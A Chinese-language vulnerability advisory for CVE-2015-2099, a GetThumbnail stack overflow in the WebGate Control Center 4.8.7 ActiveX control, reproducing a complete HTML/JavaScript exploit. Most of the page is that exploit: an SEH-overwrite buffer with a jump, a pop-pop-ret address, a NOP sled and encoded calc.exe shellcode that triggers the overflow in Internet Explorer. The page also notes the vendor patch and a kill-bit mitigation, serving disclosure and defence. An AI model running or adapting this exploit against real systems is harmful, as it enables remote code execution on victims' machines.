WebGate Control Center 4.8.7 GetThumbnail栈溢出漏洞
发表日期:2015-04-02 10:20:12
WebGate Control Center 4.8.7 GetThumbnail栈溢出漏洞
CVE-ID:CVE-2015-2099
发布日期:2015-03-27
更新日期:2015-03-30
受影响系统:
Webgate WebGate Control Center 4.8.7
Webgate WebGate Control Center
详细信息:
WebGate Control Center是网络视频监控终端的中心监控程序。
WESPPlayback.WESPPlaybackCtrl.1控件存在安全漏洞:GetThumbnail方法将任意数据复制到固定大小的栈缓冲区,攻击者可借此在受影响浏览器的上下文中执行任意代码。
来源:
rgod (rgod@autistici.org)
参考信息:
http://www.zerodayinitiative.com/advisories/ZDI-15-063/
测试方法:
警告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<!--
Author: Praveen Darshanam
http://blog.disects.com/
http://darshanams.blogspot.com
# Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day)
# Date: 27th March, 2015
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35
# Version: Control Center 4.8.7
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2099
targetFile = "C:\\WINDOWS\\system32\\WESPSDK\\WESPPlayback.dll"
prototype = "Sub GetThumbnail ( ByVal SiteSerialNumber As String , ByVal Channel As Integer , ByVal secTime As Long , ByVal miliTime As Integer )"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
-->
<object classid=\'clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8\' id=\'getthumb\'>
</object>
<script>
// Proof of concept from the advisory above. The first argument handed to
// GetThumbnail at the end of this script is padded until its .length is
// 5000 (see the loop over buff2), far larger than the fixed-size stack
// buffer the advisory says the method copies it into. From a defender's
// view the indicator is an HTML page that instantiates the CLSID in the
// <object> tag above and calls GetThumbnail with a multi-kilobyte string;
// the fix is the vendor update listed under 解决办法, with the IE kill bit
// for that CLSID as the interim control.
var buff1 = "";
// Channel, secTime, miliTime (see the VB prototype in the HTML comment);
// fixed to 1, they take no part in the overflow.
var arg2=1;
var arg3=1;
var arg4=1;
var nops = "";
var buff2 = "";
// NOTE: i, nseh, sc and fbuff below are assigned without var and become
// implicit globals; left exactly as in the original PoC.
for (i=0;i<24; i++)
{
buff1 += "B";
}
// jump over seh to shellcode
nseh = "\\xeb\\x08PD";
// pop pop ret
var seh = "\\xa0\\xf2\\x07\\x10";
for (i=0;i<80; i++)
{
nops += "\\x90";
}
//calc.exe payload
sc = "\\x54\\x5d\\xda\\xc9\\xd9\\x75\\xf4\\x59\\x49\\x49\\x49\\x49\\x49" +
"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30" +
"\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30" +
"\\x30\\x41\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42" +
"\\x32\\x42\\x42\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a" +
"\\x49\\x4b\\x4c\\x5a\\x48\\x4b\\x32\\x45\\x50\\x55\\x50\\x43\\x30" +
"\\x53\\x50\\x4b\\x39\\x4d\\x35\\x30\\x31\\x4f\\x30\\x52\\x44\\x4c" +
"\\x4b\\x56\\x30\\x46\\x50\\x4c\\x4b\\x31\\x42\\x34\\x4c\\x4c\\x4b" +
"\\x31\\x42\\x44\\x54\\x4c\\x4b\\x32\\x52\\x47\\x58\\x54\\x4f\\x38" +
"\\x37\\x50\\x4a\\x37\\x56\\x46\\x51\\x4b\\x4f\\x4e\\x4c\\x57\\x4c" +
"\\x35\\x31\\x33\\x4c\\x33\\x32\\x46\\x4c\\x37\\x50\\x49\\x51\\x48" +
"\\x4f\\x34\\x4d\\x45\\x51\\x4f\\x37\\x4d\\x32\\x4a\\x52\\x36\\x32" +
"\\x46\\x37\\x4c\\x4b\\x36\\x32\\x32\\x30\\x4c\\x4b\\x30\\x4a\\x37" +
"\\x4c\\x4c\\x4b\\x30\\x4c\\x32\\x31\\x54\\x38\\x5a\\x43\\x51\\x58" +
"\\x33\\x31\\x4e\\x31\\x30\\x51\\x4c\\x4b\\x36\\x39\\x47\\x50\\x53" +
"\\x31\\x48\\x53\\x4c\\x4b\\x30\\x49\\x35\\x48\\x5a\\x43\\x36\\x5a" +
"\\x57\\x39\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x33\\x31\\x49\\x46\\x56" +
"\\x51\\x4b\\x4f\\x4e\\x4c\\x49\\x51\\x38\\x4f\\x54\\x4d\\x35\\x51" +
"\\x58\\x47\\x37\\x48\\x4d\\x30\\x34\\x35\\x4a\\x56\\x43\\x33\\x43" +
"\\x4d\\x5a\\x58\\x37\\x4b\\x43\\x4d\\x46\\x44\\x43\\x45\\x4d\\x34" +
"\\x56\\x38\\x4c\\x4b\\x56\\x38\\x31\\x34\\x43\\x31\\x4e\\x33\\x42" +
"\\x46\\x4c\\x4b\\x44\\x4c\\x30\\x4b\\x4c\\x4b\\x36\\x38\\x45\\x4c" +
"\\x45\\x51\\x4e\\x33\\x4c\\x4b\\x54\\x44\\x4c\\x4b\\x33\\x31\\x48" +
"\\x50\\x4c\\x49\\x57\\x34\\x36\\x44\\x51\\x34\\x51\\x4b\\x51\\x4b" +
"\\x33\\x51\\x30\\x59\\x50\\x5a\\x36\\x31\\x4b\\x4f\\x4b\\x50\\x31" +
"\\x4f\\x51\\x4f\\x51\\x4a\\x4c\\x4b\\x42\\x32\\x5a\\x4b\\x4c\\x4d" +
"\\x31\\x4d\\x53\\x5a\\x35\\x51\\x4c\\x4d\\x4c\\x45\\x58\\x32\\x43" +
"\\x30\\x53\\x30\\x55\\x50\\x56\\x30\\x42\\x48\\x50\\x31\\x4c\\x4b" +
"\\x42\\x4f\\x4d\\x57\\x4b\\x4f\\x59\\x45\\x4f\\x4b\\x5a\\x50\\x48" +
"\\x35\\x4f\\x52\\x30\\x56\\x53\\x58\\x4e\\x46\\x5a\\x35\\x4f\\x4d" +
"\\x4d\\x4d\\x4b\\x4f\\x38\\x55\\x47\\x4c\\x53\\x36\\x33\\x4c\\x45" +
"\\x5a\\x4b\\x30\\x4b\\x4b\\x4b\\x50\\x43\\x45\\x43\\x35\\x4f\\x4b" +
"\\x47\\x37\\x32\\x33\\x53\\x42\\x42\\x4f\\x42\\x4a\\x55\\x50\\x46" +
"\\x33\\x4b\\x4f\\x49\\x45\\x43\\x53\\x53\\x51\\x52\\x4c\\x52\\x43" +
"\\x36\\x4e\\x55\\x35\\x44\\x38\\x33\\x55\\x33\\x30\\x41\\x41";
// Pad so the combined argument has .length 5000; if the other pieces
// already exceed that, the bound is negative and this loop does not run.
for (i=0;i<(5000-(buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
buff2 += "A";
}
fbuff = buff1 + nseh + seh + nops + sc + buff2;
// Trigger: the oversized string goes in as SiteSerialNumber, the
// parameter the advisory identifies as copied into a fixed-size stack buffer.
getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4);
</script>
</html>
解决办法:
厂商补丁:
Webgate
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35